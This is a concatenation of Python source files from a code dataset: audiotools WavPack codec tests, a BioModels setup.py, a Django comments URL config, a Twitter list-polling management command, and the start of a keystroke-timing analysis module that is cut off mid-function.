self.assertEquals([c.__size__ for c in chunks],
[c.__size__ for c in [FMT, DATA]])
self.assertEquals([c.__data__ for c in chunks],
[c.__data__ for c in [FMT, DATA]])
finally:
temp.close()
fixed.close()
#test converting 24bps file to WAVEFORMATEXTENSIBLE
#FIXME
class WavPackFileTest(TestForeignWaveChunks,
LosslessFileTest):
def setUp(self):
self.audio_class = audiotools.WavPackAudio
self.suffix = "." + self.audio_class.SUFFIX
from audiotools.decoders import WavPackDecoder
from audiotools.encoders import encode_wavpack
self.decoder = WavPackDecoder
self.encode = encode_wavpack
self.encode_opts = [{"block_size": 44100,
"false_stereo": True,
"wasted_bits": True,
"joint_stereo": False,
"correlation_passes": 0},
{"block_size": 44100,
"false_stereo": True,
"wasted_bits": True,
"joint_stereo": True,
"correlation_passes": 0},
{"block_size": 44100,
"false_stereo": True,
"wasted_bits": True,
"joint_stereo": True,
"correlation_passes": 1},
{"block_size": 44100,
"false_stereo": True,
"wasted_bits": True,
"joint_stereo": True,
"correlation_passes": 2},
{"block_size": 44100,
"false_stereo": True,
"wasted_bits": True,
"joint_stereo": True,
"correlation_passes": 5},
{"block_size": 44100,
"false_stereo": True,
"wasted_bits": True,
"joint_stereo": True,
"correlation_passes": 10},
{"block_size": 44100,
"false_stereo": True,
"wasted_bits": True,
"joint_stereo": True,
"correlation_passes": 16}]
@FORMAT_WAVPACK
def test_init(self):
#check missing file
self.assertRaises(audiotools.wavpack.InvalidWavPack,
audiotools.WavPackAudio,
"/dev/null/foo")
#check invalid file
invalid_file = tempfile.NamedTemporaryFile(suffix=".wv")
try:
for c in "invalidstringxxx":
invalid_file.write(c)
invalid_file.flush()
self.assertRaises(audiotools.wavpack.InvalidWavPack,
audiotools.WavPackAudio,
invalid_file.name)
finally:
invalid_file.close()
#check some decoder errors,
#mostly to ensure a failed init doesn't make Python explode
self.assertRaises(TypeError, self.decoder)
self.assertRaises(TypeError, self.decoder, None)
self.assertRaises(IOError, self.decoder, "/dev/null/foo")
self.assertRaises(IOError, self.decoder, "/dev/null", sample_rate=-1)
@FORMAT_WAVPACK
def test_verify(self):
#test truncating a WavPack file causes verify()
#to raise InvalidFile as necessary
wavpackdata = open("wavpack-combo.wv", "rb").read()
temp = tempfile.NamedTemporaryFile(
suffix="." + self.audio_class.SUFFIX)
try:
self.assertEqual(audiotools.open("wavpack-combo.wv").verify(),
True)
temp.write(wavpackdata)
temp.flush()
test_wavpack = audiotools.open(temp.name)
for i in xrange(0, 0x20B):
f = open(temp.name, "wb")
f.write(wavpackdata[0:i])
f.close()
self.assertEqual(os.path.getsize(temp.name), i)
self.assertRaises(audiotools.InvalidFile,
test_wavpack.verify)
#Swapping random bits doesn't affect WavPack's decoding
#in many instances - which is surprising since I'd
#expect its adaptive routines to be more susceptible
#to values being out-of-whack during decorrelation.
#This resilience may be related to its hybrid mode,
#but it doesn't inspire confidence.
finally:
temp.close()
#test truncating a WavPack file causes the WavPackDecoder
#to raise IOError as necessary
from audiotools.decoders import WavPackDecoder
f = open("silence.wv")
wavpack_data = f.read()
f.close()
temp = tempfile.NamedTemporaryFile(suffix=".wv")
try:
for i in xrange(0, len(wavpack_data)):
temp.seek(0, 0)
temp.write(wavpack_data[0:i])
temp.flush()
self.assertEqual(os.path.getsize(temp.name), i)
try:
decoder = WavPackDecoder(temp.name)
except IOError:
#chopping off the first few bytes might trigger
#an IOError at init-time, which is ok
continue
self.assertNotEqual(decoder, None)
decoder = WavPackDecoder(temp.name)
self.assertNotEqual(decoder, None)
self.assertRaises(IOError,
audiotools.transfer_framelist_data,
decoder, lambda f: f)
finally:
temp.close()
#test a truncated WavPack file's convert() method
#generates EncodingErrors
temp = tempfile.NamedTemporaryFile(
suffix="." + self.audio_class.SUFFIX)
try:
temp.write(open("wavpack-combo.wv", "rb").read())
temp.flush()
wavpack = audiotools.open(temp.name)
f = open(temp.name, "wb")
f.write(open("wavpack-combo.wv", "rb").read()[0:-0x20B])
f.close()
if (os.path.isfile("dummy.wav")):
os.unlink("dummy.wav")
self.assertEqual(os.path.isfile("dummy.wav"), False)
self.assertRaises(audiotools.EncodingError,
wavpack.convert,
"dummy.wav",
audiotools.WaveAudio)
self.assertEqual(os.path.isfile("dummy.wav"), False)
finally:
temp.close()
def __stream_variations__(self):
for stream in [
test_streams.Sine8_Mono(200000, 48000, 441.0, 0.50, 441.0, 0.49),
test_streams.Sine8_Mono(200000, 96000, 441.0, 0.61, 661.5, 0.37),
test_streams.Sine8_Mono(200000, 44100, 441.0, 0.50, 882.0, 0.49),
test_streams.Sine8_Mono(200000, 44100, 441.0, 0.50, 4410.0, 0.49),
test_streams.Sine8_Mono(200000, 44100, 8820.0, 0.70, 4410.0, 0.29),
test_streams.Sine8_Stereo(200000, 48000, 441.0, 0.50, 441.0, 0.49, 1.0),
test_streams.Sine8_Stereo(200000, 48000, 441.0, 0.61, 661.5, 0.37, 1.0),
test_streams.Sine8_Stereo(200000, 96000, 441.0, 0.50, 882.0, 0.49, 1.0),
test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.0),
test_streams.Sine8_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 1.0),
test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.50, 441.0, 0.49, 0.5),
test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.61, 661.5, 0.37, 2.0),
test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.50, 882.0, 0.49, 0.7),
test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.3),
test_streams.Sine8_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 0.1),
test_streams.Sine16_Mono(200000, 48000, 441.0, 0.50, 441.0, 0.49),
test_streams.Sine16_Mono(200000, 96000, 441.0, 0.61, 661.5, 0.37),
test_streams.Sine16_Mono(200000, 44100, 441.0, 0.50, 882.0, 0.49),
test_streams.Sine16_Mono(200000, 44100, 441.0, 0.50, 4410.0, 0.49),
test_streams.Sine16_Mono(200000, 44100, 8820.0, 0.70, 4410.0, 0.29),
test_streams.Sine16_Stereo(200000, 48000, 441.0, 0.50, 441.0, 0.49, 1.0),
test_streams.Sine16_Stereo(200000, 48000, 441.0, 0.61, 661.5, 0.37, 1.0),
test_streams.Sine16_Stereo(200000, 96000, 441.0, 0.50, 882.0, 0.49, 1.0),
test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.0),
test_streams.Sine16_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 1.0),
test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 441.0, 0.49, 0.5),
test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.61, 661.5, 0.37, 2.0),
test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 882.0, 0.49, 0.7),
test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.3),
test_streams.Sine16_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 0.1),
test_streams.Sine24_Mono(200000, 48000, 441.0, 0.50, 441.0, 0.49),
test_streams.Sine24_Mono(200000, 96000, 441.0, 0.61, 661.5, 0.37),
test_streams.Sine24_Mono(200000, 44100, 441.0, 0.50, 882.0, 0.49),
test_streams.Sine24_Mono(200000, 44100, 441.0, 0.50, 4410.0, 0.49),
test_streams.Sine24_Mono(200000, 44100, 8820.0, 0.70, 4410.0, 0.29),
test_streams.Sine24_Stereo(200000, 48000, 441.0, 0.50, 441.0, 0.49, 1.0),
test_streams.Sine24_Stereo(200000, 48000, 441.0, 0.61, 661.5, 0.37, 1.0),
test_streams.Sine24_Stereo(200000, 96000, 441.0, 0.50, 882.0, 0.49, 1.0),
test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.0),
test_streams.Sine24_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 1.0),
test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.50, 441.0, 0.49, 0.5),
test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.61, 661.5, 0.37, 2.0),
test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.50, 882.0, 0.49, 0.7),
test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.3),
test_streams.Sine24_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 0.1),
test_streams.Simple_Sine(200000, 44100, 0x7, 8,
(25, 10000),
(50, 20000),
(120, 30000)),
test_streams.Simple_Sine(200000, 44100, 0x33, 8,
(25, 10000),
(50, 20000),
(75, 30000),
(65, 40000)),
test_streams.Simple_Sine(200000, 44100, 0x37, 8,
(25, 10000),
(35, 15000),
(45, 20000),
(50, 25000),
(55, 30000)),
test_streams.Simple_Sine(200000, 44100, 0x3F, 8,
(25, 10000),
(45, 15000),
(65, 20000),
(85, 25000),
(105, 30000),
(120, 35000)),
test_streams.Simple_Sine(200000, 44100, 0x7, 16,
(6400, 10000),
(12800, 20000),
(30720, 30000)),
test_streams.Simple_Sine(200000, 44100, 0x33, 16,
(6400, 10000),
(12800, 20000),
(19200, 30000),
(16640, 40000)),
test_streams.Simple_Sine(200000, 44100, 0x37, 16,
(6400, 10000),
(8960, 15000),
(11520, 20000),
(12800, 25000),
(14080, 30000)),
test_streams.Simple_Sine(200000, 44100, 0x3F, 16,
(6400, 10000),
(11520, 15000),
(16640, 20000),
(21760, 25000),
(26880, 30000),
(30720, 35000)),
test_streams.Simple_Sine(200000, 44100, 0x7, 24,
(1638400, 10000),
(3276800, 20000),
(7864320, 30000)),
test_streams.Simple_Sine(200000, 44100, 0x33, 24,
(1638400, 10000),
(3276800, 20000),
(4915200, 30000),
(4259840, 40000)),
test_streams.Simple_Sine(200000, 44100, 0x37, 24,
(1638400, 10000),
(2293760, 15000),
(2949120, 20000),
(3276800, 25000),
(3604480, 30000)),
test_streams.Simple_Sine(200000, 44100, 0x3F, 24,
(1638400, 10000),
(2949120, 15000),
(4259840, 20000),
(5570560, 25000),
(6881280, 30000),
(7864320, 35000))]:
yield stream
def __test_reader__(self, pcmreader, **encode_options):
if (not audiotools.BIN.can_execute(audiotools.BIN["wvunpack"])):
self.assert_(False,
"reference WavPack binary wvunpack(1) required for this test")
temp_file = tempfile.NamedTemporaryFile(suffix=".wv")
self.encode(temp_file.name,
audiotools.BufferedPCMReader(pcmreader),
**encode_options)
sub = subprocess.Popen([audiotools.BIN["wvunpack"],
"-vmq", temp_file.name],
stdout=open(os.devnull, "wb"),
stderr=open(os.devnull, "wb"))
self.assertEqual(sub.wait(), 0,
"wvunpack decode error on %s with options %s" % \
(repr(pcmreader),
repr(encode_options)))
wavpack = self.decoder(temp_file.name)
self.assertEqual(wavpack.sample_rate, pcmreader.sample_rate)
self.assertEqual(wavpack.bits_per_sample, pcmreader.bits_per_sample)
self.assertEqual(wavpack.channels, pcmreader.channels)
self.assertEqual(wavpack.channel_mask, pcmreader.channel_mask)
md5sum = md5()
f = wavpack.read(audiotools.FRAMELIST_SIZE)
while (len(f) > 0):
md5sum.update(f.to_bytes(False, True))
f = wavpack.read(audiotools.FRAMELIST_SIZE)
wavpack.close()
self.assertEqual(md5sum.digest(), pcmreader.digest())
temp_file.close()
@FORMAT_WAVPACK
def test_small_files(self):
for opts in self.encode_opts:
for g in [test_streams.Generate01,
test_streams.Generate02,
test_streams.Generate03,
test_streams.Generate04]:
gen = g(44100)
self.__test_reader__(gen, **opts)
@FORMAT_WAVPACK
def test_full_scale_deflection(self):
for opts in self.encode_opts:
for (bps, fsd) in [(8, test_streams.fsd8),
(16, test_streams.fsd16),
(24, test_streams.fsd24)]:
for pattern in [test_streams.PATTERN01,
test_streams.PATTERN02,
test_streams.PATTERN03,
test_streams.PATTERN04,
test_streams.PATTERN05,
test_streams.PATTERN06,
test_streams.PATTERN07]:
self.__test_reader__(
test_streams.MD5Reader(fsd(pattern, 100)), **opts)
@FORMAT_WAVPACK
def test_wasted_bps(self):
for opts in self.encode_opts:
self.__test_reader__(test_streams.WastedBPS16(1000), **opts)
@FORMAT_WAVPACK
def test_blocksizes(self):
noise = struct.unpack(">32h", os.urandom(64))
opts = {"false_stereo": False,
"wasted_bits": False,
"joint_stereo": False}
for block_size in [16, 17, 18, 19, 20, 21, 22, 23,
24, 25, 26, 27, 28, 29, 30, 31, 32, 33]:
for decorrelation_passes in [0, 1, 5]:
opts_copy = opts.copy()
opts_copy["block_size"] = block_size
opts_copy["correlation_passes"] = decorrelation_passes
self.__test_reader__(test_streams.MD5Reader(
test_streams.FrameListReader(noise,
44100, 1, 16)),
**opts_copy)
@FORMAT_WAVPACK
def test_silence(self):
for opts in self.encode_opts:
for (channels, mask) in [
(1, audiotools.ChannelMask.from_channels(1)),
(2, audiotools.ChannelMask.from_channels(2)),
(4, audiotools.ChannelMask.from_fields(
front_left=True,
front_right=True,
back_left=True,
back_right=True)),
(8, audiotools.ChannelMask(0))]:
for bps in [8, 16, 24]:
opts_copy = opts.copy()
for block_size in [44100, 32, 32768, 65535,
16777215]:
opts_copy['block_size'] = block_size
self.__test_reader__(
MD5_Reader(
EXACT_SILENCE_PCM_Reader(
pcm_frames=65536,
sample_rate=44100,
channels=channels,
channel_mask=mask,
bits_per_sample=bps)),
**opts_copy)
@FORMAT_WAVPACK
def test_noise(self):
for opts in self.encode_opts:
for (channels, mask) in [
(1, audiotools.ChannelMask.from_channels(1)),
(2, audiotools.ChannelMask.from_channels(2)),
(4, audiotools.ChannelMask.from_fields(
front_left=True,
front_right=True,
back_left=True,
back_right=True)),
(8, audiotools.ChannelMask(0))]:
for bps in [8, 16, 24]:
opts_copy = opts.copy()
for block_size in [44100, 32, 32768, 65535,
16777215]:
opts_copy['block_size'] = block_size
self.__test_reader__(
MD5_Reader(EXACT_RANDOM_PCM_Reader(
pcm_frames=65536,
sample_rate=44100,
channels=channels,
channel_mask=mask,
bits_per_sample=bps)),
**opts_copy)
@FORMAT_WAVPACK
def test_fractional(self):
def __perform_test__(block_size, pcm_frames):
self.__test_reader__(
MD5_Reader(EXACT_RANDOM_PCM_Reader(
pcm_frames=pcm_frames,
sample_rate=44100,
channels=2,
bits_per_sample=16)),
block_size=block_size,
correlation_passes=5,
false_stereo=False,
wasted_bits=False,
joint_stereo=False)
for pcm_frames in [31, 32, 33, 34, 35, 2046, 2047, 2048, 2049, 2050]:
__perform_test__(33, pcm_frames)
for pcm_frames in [254, 255, 256, 257, 258, 510, 511, 512, 513,
514, 1022, 1023, 1024, 1025, 1026, 2046, 2047,
2048, 2049, 2050, 4094, 4095, 4096, 4097, 4098]:
__perform_test__(256, pcm_frames)
for pcm_frames in [1022, 1023, 1024, 1025, 1026, 2046, 2047,
2048, 2049, 2050, 4094, 4095, 4096, 4097, 4098]:
__perform_test__(2048, pcm_frames)
for pcm_frames in [1022, 1023, 1024, 1025, 1026, 2046, 2047,
2048, 2049, 2050, 4094, 4095, 4096, 4097,
4098, 4606, 4607, 4608, 4609, 4610, 8190,
8191, 8192, 8193, 8194, 16382, 16383, 16384,
16385, 16386]:
__perform_test__(4608, pcm_frames)
for pcm_frames in [44098, 44099, 44100, 44101, 44102, 44103,
88198, 88199, 88200, 88201, 88202, 88203]:
__perform_test__(44100, pcm_frames)
@FORMAT_WAVPACK
def test_multichannel(self):
def __permutations__(executables, options, total):
if (total == 0):
yield []
else:
for (executable, option) in zip(executables,
options):
for permutation in __permutations__(executables,
options,
total - 1):
yield [executable(**option)] + permutation
#test a mix of identical and non-identical channels
#using different decorrelation, joint stereo and false stereo options
combos = 0
for (false_stereo, joint_stereo) in [(False, False),
(False, True),
(True, False),
(True, True)]:
for (channels, mask) in [(2, 0x3), (3, 0x7), (4, 0x33),
(5, 0x3B), (6, 0x3F)]:
for readers in __permutations__([
EXACT_BLANK_PCM_Reader,
EXACT_RANDOM_PCM_Reader,
test_streams.Sine16_Mono],
[
{"pcm_frames": 100,
"sample_rate": 44100,
"channels": 1,
"bits_per_sample": 16},
{"pcm_frames": 100,
"sample_rate": 44100,
"channels": 1,
"bits_per_sample": 16},
{"pcm_frames": 100,
"sample_rate": 44100,
"f1": 441.0,
"a1": 0.61,
"f2": 661.5,
"a2": 0.37}],
channels):
joined = MD5_Reader(Join_Reader(readers, mask))
self.__test_reader__(joined,
block_size=44100,
false_stereo=false_stereo,
joint_stereo=joint_stereo,
correlation_passes=1,
wasted_bits=False)
@FORMAT_WAVPACK
def test_sines(self):
for opts in self.encode_opts:
for g in self.__stream_variations__():
self.__test_reader__(g, **opts)
@FORMAT_WAVPACK
def test_option_variations(self):
for block_size in [11025, 22050, 44100, 88200, 176400]:
for false_stereo in [False, True]:
for wasted_bits in [False, True]:
for joint_stereo in [False, True]:
for decorrelation_passes in [0, 1, 2, 5, 10, 16]:
self.__test_reader__(
test_streams.Sine16_Stereo(200000,
48000,
441.0,
0.50,
441.0,
0.49,
1.0),
block_size=block_size,
false_stereo=false_stereo,
wasted_bits=wasted_bits,
joint_stereo=joint_stereo,
correlation_passes=decorrelation_passes)
@FORMAT_WAVPACK
def test_python_codec(self):
def test_python_reader(pcmreader, **encode_options):
from audiotools.py_encoders import encode_wavpack
#encode file using Python-based encoder
temp_file = tempfile.NamedTemporaryFile(suffix=".wv")
encode_wavpack(temp_file.name,
audiotools.BufferedPCMReader(pcmreader),
**encode_options)
#verify contents of file decoded by
#Python-based decoder against contents decoded by
#C-based decoder
from audiotools.py_decoders import WavPackDecoder as WavPackDecoder1
from audiotools.decoders import WavPackDecoder as WavPackDecoder2
self.assertEqual(audiotools.pcm_frame_cmp(
WavPackDecoder1(temp_file.name),
WavPackDecoder2(temp_file.name)), None)
temp_file.close()
#test small files
for opts in self.encode_opts:
for g in [test_streams.Generate01,
test_streams.Generate02,
test_streams.Generate03,
test_streams.Generate04]:
gen = g(44100)
test_python_reader(gen, **opts)
#test full scale deflection
for opts in self.encode_opts:
for (bps, fsd) in [(8, test_streams.fsd8),
(16, test_streams.fsd16),
(24, test_streams.fsd24)]:
for pattern in [test_streams.PATTERN01,
test_streams.PATTERN02,
test_streams.PATTERN03,
test_streams.PATTERN04,
test_streams.PATTERN05,
test_streams.PATTERN06,
test_streams.PATTERN07]:
test_python_reader(fsd(pattern, 100), **opts)
#test wasted BPS
for opts in self.encode_opts:
test_python_reader(test_streams.WastedBPS16(1000), **opts)
#test block sizes
noise = struct.unpack(">32h", os.urandom(64))
opts = {"false_stereo": False,
"wasted_bits": False,
"joint_stereo": False}
for block_size in [16, 17, 18, 19, 20, 21, 22, 23,
24, 25, 26, 27, 28, 29, 30, 31, 32, 33]:
for decorrelation_passes in [0, 1, 5]:
opts_copy = opts.copy()
opts_copy["block_size"] = block_size
opts_copy["correlation_passes"] = decorrelation_passes
test_python_reader(
test_streams.FrameListReader(noise,
44100, 1, 16),
**opts_copy)
#test silence
for opts in self.encode_opts:
for (channels, mask) in [
(1, audiotools.ChannelMask.from_channels(1)),
(2, audiotools.ChannelMask.from_channels(2))]:
opts_copy = opts.copy()
opts_copy['block_size'] = 4095
test_python_reader(
EXACT_SILENCE_PCM_Reader(
pcm_frames=4096,
sample_rate=44100,
channels=channels,
channel_mask=mask,
bits_per_sample=16),
**opts_copy)
#test noise
for opts in self.encode_opts:
for (channels, mask) in [
(1, audiotools.ChannelMask.from_channels(1)),
(2, audiotools.ChannelMask.from_channels(2))]:
opts_copy = opts.copy()
opts_copy['block_size'] = 4095
test_python_reader(
EXACT_RANDOM_PCM_Reader(
pcm_frames=4096,
sample_rate=44100,
channels=channels,
channel_mask=mask,
bits_per_sample=16),
**opts_copy)
#test fractional
for (block_size,
pcm_frames_list) in [(33, [31, 32, 33, 34, 35, 2046,
2047, 2048, 2049, 2050]),
(256, [254, 255, 256, 257, 258, 510,
511, 512, 513, 514, 1022, 1023,
1024, 1025, 1026, 2046, 2047, 2048,
2049, 2050, 4094, 4095, 4096, 4097,
4098])]:
for pcm_frames in pcm_frames_list:
test_python_reader(EXACT_RANDOM_PCM_Reader(
pcm_frames=pcm_frames,
sample_rate=44100,
channels=2,
bits_per_sample=16),
block_size=block_size,
correlation_passes=5,
false_stereo=False,
wasted_bits=False,
joint_stereo=False)
#test sines
for opts in self.encode_opts:
for g in [test_streams.Sine8_Mono(5000, 48000,
441.0, 0.50, 441.0, 0.49),
test_streams.Sine8_Stereo(5000, 48000,
441.0, 0.50, 441.0, 0.49, 1.0),
test_streams.Sine16_Mono(5000, 48000,
441.0, 0.50, 441.0, 0.49),
test_streams.Sine16_Stereo(5000, 48000,
441.0, 0.50, 441.0, 0.49, 1.0),
test_streams.Sine24_Mono(5000, 48000,
441.0, 0.50, 441.0, 0.49),
test_streams.Sine24_Stereo(5000, 48000,
441.0, 0.50, 441.0, 0.49, 1.0),
test_streams.Simple_Sine(5000, 44100, 0x7, 8,
(25, 10000),
(50, 20000),
(120, 30000)),
test_streams.Simple_Sine(5000, 44100, 0x33, 8,
(25, 10000),
(50, 20000),
(75, 30000),
(65, 40000)),
test_streams.Simple_Sine(5000, 44100, 0x37, 8,
(25, 10000),
(35, 15000),
(45, 20000),
(50, 25000),
(55, 30000)),
test_streams.Simple_Sine(5000, 44100, 0x3F, 8,
(25, 10000),
(45, 15000),
(65, 20000),
(85, 25000),
(105, 30000),
(120, 35000)),
test_streams.Simple_Sine(5000, 44100, 0x7, 16,
(6400, 10000),
(12800, 20000),
(30720, 30000)),
test_streams.Simple_Sine(5000, 44100, 0x33, 16,
(6400, 10000),
(12800, 20000),
(19200, 30000),
(16640, 40000)),
test_streams.Simple_Sine(5000, 44100, 0x37, 16,
(6400, 10000),
(8960, 15000),
(11520, 20000),
(12800, 25000),
(14080, 30000)),
test_streams.Simple_Sine(5000, 44100, 0x3F, 16,
(6400, 10000),
(11520, 15000),
(16640, 20000),
(21760, 25000),
(26880, 30000),
(30720, 35000)),
test_streams.Simple_Sine(5000, 44100, 0x7, 24,
(1638400, 10000),
(3276800, 20000),
(7864320, 30000)),
test_streams.Simple_Sine(5000, 44100, 0x33, 24,
(1638400, 10000),
(3276800, 20000),
(4915200, 30000),
(4259840, 40000)),
test_streams.Simple_Sine(5000, 44100, 0x37, 24,
(1638400, 10000),
(2293760, 15000),
(2949120, 20000),
(3276800, 25000),
(3604480, 30000)),
test_streams.Simple_Sine(5000, 44100, 0x3F, 24,
(1638400, 10000),
(2949120, 15000),
(4259840, 20000),
(5570560, 25000),
(6881280, 30000),
(7864320, 35000))]:
test_python_reader(g, **opts)
class SineStreamTest(unittest.TestCase):
@FORMAT_SINES
def test_init(self):
from audiotools.decoders import Sine_Mono
from audiotools.decoders import Sine_Stereo
from audiotools.decoders import Sine_Simple
#ensure that failed inits don't make Python explode
self.assertRaises(ValueError, Sine_Mono,
-1, 4000, 44100, 1.0, 1.0, 1.0, 1.0)
self.assertRaises(ValueError, Sine_Mono,
16, -1, 44100, 1.0, 1.0, 1.0, 1.0)
self.assertRaises(ValueError, Sine_Mono,
16, 4000, -1, 1.0, 1.0, 1.0, 1.0)
self.assertRaises(ValueError, Sine_Stereo,
-1, 4000, 44100, 1.0, 1.0, 1.0, 1.0, 1.0)
self.assertRaises(ValueError, Sine_Stereo,
16, -1, 44100, 1.0, 1.0, 1.0, 1.0, 1.0)
self.assertRaises(ValueError, Sine_Stereo,
16, 4000, -1, 1.0, 1.0, 1.0, 1.0, 1.0)
self.assertRaises(ValueError, Sine_Simple,
-1, 4000, 44100, 100, 100)
self.assertRaises(ValueError, Sine_Simple,
16, -1, 44100, 100, 100)
self.assertRaises(ValueError, Sine_Simple,
16, 4000, -1, 100, 100)
| Excito/audiotools | test/test_formats.py | Python | gpl-2.0 | 272,152 |
from setuptools import setup, find_packages
setup(name='BIOMD0000000210',
version=20140916,
description='BIOMD0000000210 from BioModels',
url='http://www.ebi.ac.uk/biomodels-main/BIOMD0000000210',
maintainer='Stanley Gu',
maintainer_url='stanleygu@gmail.com',
packages=find_packages(),
package_data={'': ['*.xml', 'README.md']},
) | biomodels/BIOMD0000000210 | setup.py | Python | cc0-1.0 | 377 |
from django.conf.urls import url
from django.contrib import admin
from .views import (
CommentListAPIView,
CommentDetailAPIView,
CommentCreateAPIView,
)
urlpatterns = [
url(r'^$', CommentListAPIView.as_view(), name='list'),
url(r'^create/$', CommentCreateAPIView.as_view(), name='create'),
url(r'^(?P<pk>\d+)/$', CommentDetailAPIView.as_view(), name='thread'),
#url(r'^(?P<id>\d+)/delete/$', comment_delete, name='delete'),
] | timle1/try_django_1_10 | comments/api/urls.py | Python | mit | 459 |
from django.core.management.base import BaseCommand, CommandError
from moderation.lists.poll import poll_lists_members
class Command(BaseCommand):
help = ("Poll lists of Twitter account, download their members, "
"update UserModerationRelationship table")
def handle(self, *args, **options):
poll_lists_members()
self.stdout.write(self.style.SUCCESS('Done polling lists members')) | jeromecc/doctoctocbot | src/moderation/management/commands/poll_lists_members.py | Python | mpl-2.0 | 424 |
import pickle
import numpy as np
import scipy.stats
from abc import ABCMeta, abstractmethod
class KeypressEventReceiver(object):
'''A class that receives keypress events through a callback'''
__metaclass__=ABCMeta
KEY_DOWN, KEY_UP= 0, 1
@abstractmethod
def on_key(self, key, event_type, time_ms):
'''key is a integer
event_type is in (KEY_DOWN, KEY_UP)
time_ms is the time when the key was (de/)pressed
'''
pass
class VersionedSerializableClass( object ):
__metaclass__=ABCMeta
FILE_EXTENSION=".pickle"
CLASS_VERSION= -1
def __init__(self, *args, **kwargs):
self._class_version= self.CLASS_VERSION
def save_to_file(self, filename):
with open(filename+self.FILE_EXTENSION, 'wb') as f:
self._serialize_to_file( f )
@classmethod
def load_from_file( cls, filename):
import os
if not os.path.exists(filename):
filename+=cls.FILE_EXTENSION
with open(filename, 'rb') as f:
instance= cls._deserialize_from_file( f )
load_error=None
if not isinstance( instance, cls ):
load_error= 'Unexpected instance type'
elif instance._class_version!=cls.CLASS_VERSION:
load_error= 'Class version mismatch (expected "{}", got "{}")'.format( cls.CLASS_VERSION, instance._class_version)
if load_error:
raise TypeError("Failed to load serialized data from {}: {}".format(filename, load_error))
return instance
@classmethod
def load_from_dir( cls, directory ):
import os
d= directory
filenames= [f for f in os.listdir(d) if f.endswith(cls.FILE_EXTENSION)]
path_names= [os.path.join(d,f) for f in filenames]
bare_names= [fn.rstrip(cls.FILE_EXTENSION) for fn in filenames] #without extension
instances= map( cls.load_from_file, path_names)
return dict(zip(bare_names, instances))
def _serialize_to_file( self, f ):
pickle.dump(self, f)
@classmethod
def _deserialize_from_file( cls, f ):
return pickle.load(f)
class KeystrokeCaptureData(KeypressEventReceiver, VersionedSerializableClass):
'''Recorded data of actual keystrokes pressed by a user'''
FILE_EXTENSION=".keypresses"
CLASS_VERSION= 0
def __init__(self, existing_data=None):
VersionedSerializableClass.__init__(self)
self.log= list(existing_data) if existing_data else []
def on_key(self, key, event_type, time_ms):
'''Append a keypress event to this capture data'''
self.log.append( (key, event_type, time_ms) )
def feed(self, event_receiver):
'''feeds this data into a KeypressEventReceiver.
Returns the event_receiver'''
for event in self.log:
event_receiver.on_key( *event )
return event_receiver
def _serialize_to_file( self, f ):
f.write( str(self.log) )
@classmethod
def _deserialize_from_file( self, f ):
from ast import literal_eval
data= literal_eval(f.read())
return KeystrokeCaptureData(data)
class InsufficientData(ValueError):
'''Raised when there is insuficient data to perform a given operation.
An example would be a low number of samples for normal distribution estimation'''
pass
class GaussianDistribution(object):
def __init__(self, mean=0.0, stddev=1.0, nsamples=None):
self.mean, self.stddev= mean, stddev
self.nsamples= nsamples
@staticmethod
def estimate_parameters( samples ):
nsamples= len(samples)
if nsamples<2:
raise InsufficientData()
mean= np.mean( samples )
stddev= np.std(samples) #TODO: use proper Normal stddev estimation formula
stddev= max( mean*0.01, stddev ) #avoid stddev==0
return mean, stddev, nsamples
def similarity( self, other_normal ):
'''quick-and-dirty hack. don't take this too seriously'''
stddev= (self.stddev + other_normal.stddev) / 2.0
difference= abs(self.mean - other_normal.mean)
return 2*scipy.stats.norm.cdf(-difference/stddev)
def similarity_number( self, number ):
stddev= self.stddev
difference= abs(self.mean - number)
return 2*scipy.stats.norm.cdf(-difference/stddev)
def __repr__(self):
return "{}({:.2f}, {:.2f}, {})".format( self.__class__.__name__, self.mean, self.stddev, self.nsamples )
class Named(object):
'''Something that has a name'''
__metaclass__=ABCMeta
def __init__(self, name):
self.name= str(name)
def __repr__( self ):
return "{}( {} )".format( self.__class__.__name__, self.name )
class DictTree(dict, Named):
'''A dict that can have other DictTree objects as values.
Basically, a arbitrary tree that can have any object as a leave.'''
IGNORE_CHILD='IGNORE_CHILD'
def __init__( self, name, children=() ):
'''If this DictTree is a child of another (its parent), NAME will be the key used to identify it in the parent dict.'''
Named.__init__(self, name)
for i,c in enumerate(children):
c_name= c.name if isinstance(c, DictTree) else self._leaf_name(c, i)
self[c_name]=c
def _leaf_name(self, leaf, default=""):
try:
return leaf.name #this might not make sense, depending on the leaf. DictTree subclasses can override this method
except AttributeError:
return default
@classmethod
def intersect( cls, *trees ):
'''Given N DictTrees, returns N DictTrees, such that
each outputed tree is a exact copy of the input, but only
contains children whose names (keys) appear on *all* trees'''
recursive=True
common_names= reduce(set.intersection, [set(f.keys()) for f in trees])
def get_childs( child_name ):
'''returns the child with child_name for every tree'''
childs= [tree[child_name] for tree in trees]
if recursive and childs and isinstance(childs[0], DictTree):
return cls.getCommonFeatures( childs )
else:
return childs
all_childs= zip(*map( get_childs, common_names ))
return [cls(tree.name, childs) for tree,childs in zip(trees, all_childs)]
@staticmethod
def _isleave( x ):
return not isinstance(x, DictTree)
@classmethod
def map( cls, f_leave, *trees ):
def map_child( *c ):
return f_leave(*c) if DictTree._isleave(c[0]) else cls.map( f_leave, *c)
